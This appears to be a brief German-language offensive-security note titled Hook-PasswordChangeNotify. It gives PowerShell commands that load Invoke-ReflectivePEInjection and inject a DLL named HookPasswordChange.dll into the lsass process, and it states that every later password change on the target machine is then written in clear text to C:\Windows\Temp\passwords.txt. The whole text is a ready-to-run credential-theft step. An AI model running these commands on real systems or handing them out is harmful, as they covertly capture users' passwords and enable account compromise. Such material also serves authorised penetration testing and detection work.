Hook-PasswordChangeNotify
- Führen Sie den folgenden Befehl in powershell aus:
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
- Wenn ein Benutzer der Zielmaschine das Passwort ändert, wird das neue Passwort in C:\Windows\Temp\passwords.txt geschrieben.